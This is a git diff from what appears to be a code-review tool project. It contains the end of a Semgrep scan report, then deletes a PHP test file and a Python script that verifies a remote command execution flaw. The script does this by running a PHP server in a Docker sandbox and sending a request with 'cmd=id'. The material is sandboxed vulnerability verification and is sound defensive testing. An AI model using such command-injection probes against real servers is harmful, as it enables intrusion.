python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py","start":{"line":72,"col":15,"offset":1932},"end":{"line":72,"col":23,"offset":1940}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py:101:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","start":{"line":101,"col":15,"offset":2731},"end":{"line":101,"col":23,"offset":2739}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py:300:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","start":{"line":300,"col":15,"offset":10031},"end":{"line":300,"col":23,"offset":10039}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py:585:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","start":{"line":585,"col":15,"offset":20431},"end":{"line":585,"col":23,"offset":20439}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py:803:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","start":{"line":803,"col":15,"offset":28487},"end":{"line":803,"col":23,"offset":28495}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/file_tool.py:217:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/file_tool.py","start":{"line":217,"col":15,"offset":6991},"end":{"line":217,"col":23,"offset":6999}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/pattern_tool.py:38:6 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/pattern_tool.py","start":{"line":38,"col":7,"offset":963},"end":{"line":38,"col":23,"offset":979}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/rag/splitter.py:482:8 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/splitter.py","start":{"line":482,"col":9,"offset":16235},"end":{"line":482,"col":33,"offset":16259}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/scanner.py:238:10 [rules: 2, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/scanner.py","start":{"line":238,"col":11,"offset":8735},"end":{"line":238,"col":25,"offset":8749}}}],"prefiltering":{"project_level_time":0.0,"file_level_time":0.0,"rules_with_project_prefilters_ratio":0.0,"rules_with_file_prefilters_ratio":0.9899620184481823,"rules_selected_ratio":0.0529028757460662,"rules_matched_ratio":0.0529028757460662},"targets":[],"total_bytes":0,"max_memory_bytes":1613084800},"engine_requested":"OSS","skipped_rules":[],"profiling_results":[]} diff --git a/ttt/t.php b/ttt/t.php deleted file mode 100644 index bb341e8..0000000 --- a/ttt/t.php +++ /dev/null @@ -1 +0,0 @@ - diff --git a/verify_rce_sandbox.py b/verify_rce_sandbox.py deleted file mode 100644 index 0433c10..0000000 --- a/verify_rce_sandbox.py +++ /dev/null @@ -1,87 +0,0 @@ - -import asyncio -import base64 -import os -import sys - -# 添加 backend 目录到路径 -sys.path.append(os.path.join(os.getcwd(), "backend")) - -from app.services.agent.tools.sandbox_tool import SandboxManager, SandboxConfig - -async def verify_rce(): - print("🚀 开始验证 RCE 漏洞...") - - # 1. 读取目标文件内容 - file_path = "ttt/t.php" - if not os.path.exists(file_path): - print(f"❌ 文件不存在: {file_path}") - return - - with open(file_path, "rb") as f: - content = f.read() - - b64_content = base64.b64encode(content).decode() - print(f"📄 读取文件 {file_path} ({len(content)} bytes)") - - # 2. 初始化沙箱管理器 - # 注意:需要启用网络模式以便 curl 本地服务(虽然是 localhost,但 bridge 模式更稳妥,或者默认 none 也可以访问 localhost? - # Docker none 网络模式只有 loopback 接口,所以 localhost 是可以通的。 - # 但是为了保险,我们使用默认配置(通常是 none),如果不行再调整。 - # 这里的关键是 php server 和 curl 在同一个容器内运行。 - - config = SandboxConfig() - # 确保网络模式允许本地通信(none 模式下只有 lo,应该没问题) - # 但有些环境可能需要 bridge - # config.network_mode = "bridge" - - manager = SandboxManager(config) - await manager.initialize() - - if not manager.is_available: - print("❌ Docker 沙箱不可用") - return - - print("🐳 沙箱初始化成功") - - # 3. 构造验证 Payload - # - 创建目录 - # - 写入文件 (使用 base64 避免转义问题) - # - 启动 PHP 服务器 (后台运行) - # - 等待服务器启动 - # - 发送恶意请求 (cmd=id) - - cmd_payload = "id" - verification_url = f"http://localhost:8000/t.php?cmd={cmd_payload}" - - sandbox_cmd = ( - f"mkdir -p ttt && " - f"echo '{b64_content}' | base64 -d > ttt/t.php && " - f"TMPDIR=/workspace php -S 0.0.0.0:8000 -t ttt > php.log 2>&1 & " - f"sleep 3 && " - f"curl -v '{verification_url}' || (echo '--- PHP LOG ---' && cat php.log)" - ) - - print(f"⚡ 执行沙箱命令:\n{sandbox_cmd}\n") - - result = await manager.execute_command(sandbox_cmd, timeout=10) - - # 4. 分析结果 - print("📊 执行结果:") - print(f"Success: {result['success']}") - print(f"Exit Code: {result['exit_code']}") - print(f"Stdout: {result['stdout'].strip()}") - print(f"Stderr: {result['stderr'].strip()}") - - if result['success']: - output = result['stdout'] - if "uid=" in output and "gid=" in output: - print("\n✅ 漏洞验证成功!发现了命令执行结果。") - print(f"证明: {output.strip()}") - else: - print("\n⚠️ 命令执行成功,但未发现预期的 id 命令输出。") - else: - print("\n❌ 验证执行失败。") - -if __name__ == "__main__": - asyncio.run(verify_rce())